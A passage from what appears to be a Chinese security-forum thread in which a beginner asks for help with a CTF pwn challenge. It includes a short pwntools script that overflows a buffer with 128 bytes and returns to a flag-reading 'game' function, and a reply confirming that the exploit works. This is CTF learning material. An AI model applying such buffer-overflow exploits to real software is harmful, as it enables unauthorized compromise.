师傅们,题目在下方附件,主要是用ida分析后发现首先没有system,/bin/sh之类的字符串,但是有一个game函数,里面可以实现对flag文件的读取,但是不知道具体思路是什么,主要是不清楚它是pwn的哪一种类型,ret2shell、ret2libc还是ret2sys,希望大佬们能伸出援手帮帮萌新
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
大佬有没有具体的做法,我打本地的话,模仿其中写了一个flag,之后调用game的地址0x0804855c,但是一直无法输出flag的结果,下面是我的exp:
from pwn import * sh = process("./pwn2") context.arch='i386' sh.recv() elf = ELF("./pwn2") print(hex(elf.symbols["game"])) game_addr = 0x0804855c payload = b'a'*128+p32(game_addr) //gdb调试得到的偏移是128 sh.send(payload) sh.interactive()
GUANZHI_ 大佬有没有具体的做法,我打本地的话,模仿其中写了一个flag,之后调用game的地址0x0804855c,但是一直无法输出flag的结果,下面是我的exp:from pwn& ...
本地有个毛的flag,你系统里恐怕连/home/ctf这个目录都没有吧。不过pwn代码是没问题的
R0g GUANZHI_ 大佬有没有具体的做法,我打本地的话,模仿其中写了一个flag,之后调用game的地址0x0804855c,但是一直无法输出fla ...